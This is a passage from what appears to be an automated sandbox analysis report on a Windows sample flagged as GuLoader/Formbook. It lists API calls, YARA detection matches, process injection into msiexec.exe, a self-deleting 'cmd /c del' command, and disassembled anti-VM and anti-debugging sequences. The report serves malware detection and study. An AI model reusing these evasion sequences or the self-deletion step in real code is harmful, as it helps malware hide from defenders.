    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119770 NtSetInformationFile,13_2_05119770
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119760 NtOpenProcess,13_2_05119760
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119780 NtMapViewOfSection,13_2_05119780
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051197A0 NtUnmapViewOfSection,13_2_051197A0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119610 NtEnumerateValueKey,13_2_05119610
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119650 NtQueryValueKey,13_2_05119650
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119670 NtQueryInformationProcess,13_2_05119670
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051196D0 NtCreateKey,13_2_051196D0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119950 NtQueueApcThread,13_2_05119950
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051199A0 NtCreateSection,13_2_051199A0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051199D0 NtCreateProcessEx,13_2_051199D0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119820 NtEnumerateKey,13_2_05119820
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511B040 NtSuspendThread,13_2_0511B040
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119840 NtDelayExecution,13_2_05119840
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051198A0 NtWriteVirtualMemory,13_2_051198A0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051198F0 NtReadVirtualMemory,13_2_051198F0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119B00 NtSetValueKey,13_2_05119B00
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A3B0 NtGetContextThread,13_2_0511A3B0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A10 NtQuerySection,13_2_05119A10
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A00 NtProtectVirtualMemory,13_2_05119A00
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A20 NtResumeThread,13_2_05119A20
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A80 NtOpenDirectoryObject,13_2_05119A80
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119D50 NtCreateFile,13_2_01119D50
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119F30 NtAllocateVirtualMemory,13_2_01119F30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E00 NtReadFile,13_2_01119E00
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E80 NtClose,13_2_01119E80
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119D4B NtCreateFile,13_2_01119D4B
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119DA4 NtCreateFile,13_2_01119DA4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119DFE NtReadFile,13_2_01119DFE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119F2B NtAllocateVirtualMemory,13_2_01119F2B
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E7A NtClose,13_2_01119E7A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004038580_2_00403858
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004012180_2_00401218
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403C2E0_2_00403C2E
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403A590_2_00403A59
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403AEE0_2_00403AEE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403A870_2_00403A87
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403B490_2_00403B49
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403B130_2_00403B13
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E166E301_2_1E166E30
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20D6161_2_1E20D616
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E212EF71_2_1E212EF7
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E211FF11_2_1E211FF1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21DFCE1_2_1E21DFCE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15841F1_2_1E15841F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20D4661_2_1E20D466
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E212D071_2_1E212D07
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E140D201_2_1E140D20
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E211D551_2_1E211D55
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1725811_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15D5E01_2_1E15D5E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2125DD1_2_1E2125DD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FFA2B1_2_1E1FFA2B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2122AE1_2_1E2122AE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E212B281_2_1E212B28
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AB401_2_1E16AB40
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17EBB01_2_1E17EBB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20DBD21_2_1E20DBD2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2003DA1_2_1E2003DA
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21E8241_2_1E21E824
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2010021_2_1E201002
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A8301_2_1E16A830
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15B0901_2_1E15B090
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2120A81_2_1E2120A8
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A01_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2128EC1_2_1E2128EC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14F9001_2_1E14F900
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1641201_2_1E164120
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF1_2_1E1699BF
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A2D0713_2_051A2D07
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D0D2013_2_050D0D20
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A1D5513_2_051A1D55
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510258113_2_05102581
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A25DD13_2_051A25DD
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050ED5E013_2_050ED5E0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E841F13_2_050E841F
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519D46613_2_0519D466
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051ADFCE13_2_051ADFCE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A1FF113_2_051A1FF1
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519D61613_2_0519D616
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F6E3013_2_050F6E30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A2EF713_2_051A2EF7
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DF90013_2_050DF900
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F412013_2_050F4120
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519100213_2_05191002
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051AE82413_2_051AE824
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB09013_2_050EB090
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051020A013_2_051020A0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A20A813_2_051A20A8
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A28EC13_2_051A28EC
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A2B2813_2_051A2B28
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510EBB013_2_0510EBB0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051903DA13_2_051903DA
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519DBD213_2_0519DBD2
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A22AE13_2_051A22AE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01102D9013_2_01102D90
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111E5ED13_2_0111E5ED
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111DF6E13_2_0111DF6E
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CF9313_2_0111CF93
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111D78113_2_0111D781
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01102FB013_2_01102FB0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01109E3013_2_01109E30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01109E2C13_2_01109E2C
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111DE5513_2_0111DE55
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 050DB150 appears 45 times
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: String function: 1E14B150 appears 66 times
    Source: 2eD17GZuWs.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: 2eD17GZuWs.exe, 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000000.00000002.691998474.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.933965294.000000001E3CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.928375557.00000000008D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000000.690796127.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exeBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
    Source: 2eD17GZuWs.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 2eD17GZuWs.exeVirustotal: Detection: 25%
    Source: unknownProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe' Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'Jump to behavior
    Source: Binary string: msiexec.pdb source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp
    Source: Binary string: msiexec.pdbGCTL source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: 2eD17GZuWs.exe, 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, msiexec.exe, 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: 2eD17GZuWs.exe, msiexec.exe
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Yara detected VB6 Downloader GenericShow sources
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040984F push ecx; retf 0_2_004098B0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00409D50 push edi; ret 0_2_00409D5D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00409D55 push edi; ret 0_2_00409D5D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406910 pushad ; iretd 0_2_00406914
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004069F5 push EF15CAC2h; ret 0_2_00406A05
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040759B push FFFFFFC6h; ret 0_2_004075A2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406653 pushad ; iretd 0_2_00406654
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406A98 pushfd ; ret 0_2_00406A9A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004082AF push FFFFFFDAh; ret 0_2_004082B2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040A3DA push ecx; retf 0_2_0040A3DC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00407FAA push esp; ret 0_2_00407FB1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00407FB3 push ecx; retf 0_2_00407FBC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E19D0D1 push ecx; ret 1_2_1E19D0E4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0512D0D1 push ecx; ret 13_2_0512D0E4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_011169BB push esi; ret 13_2_011169BC
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0110AB07 push ds; retf 13_2_0110AB09
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CF5C push eax; ret 13_2_0111CF62
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01114E05 push ss; retf 13_2_01114E06
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEA5 push eax; ret 13_2_0111CEF8
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEF2 push eax; ret 13_2_0111CEF8
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEFB push eax; ret 13_2_0111CF62
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: 2eD17GZuWs.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F13 second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA87CD1247Ch 0x0000001c call 00007FA87CD1244Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4FA0 second address: 00000000021D4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CD1284Dh 0x0000001f popad 0x00000020 call 00007FA87CD12521h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 0000000000564FA0 second address: 0000000000564FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CCF94CDh 0x0000001f popad 0x00000020 call 00007FA87CCF91A1h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000011098E4 second address: 00000000011098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000001109B4E second address: 0000000001109B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B rdtsc 0_2_021D044B
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: explorer.exe, 0000000A.00000000.896175080.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000000.894315754.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000000.896175080.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 2eD17GZuWs.exe, 00000001.00000003.927010291.0000000000948000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 0000000A.00000002.940809736.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
    Source: 2eD17GZuWs.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging:

    barindex
    Contains functionality to hide a thread from the debuggerShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D06B1 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,000000000_2_021D06B1
    Hides threads from debuggersShow sources
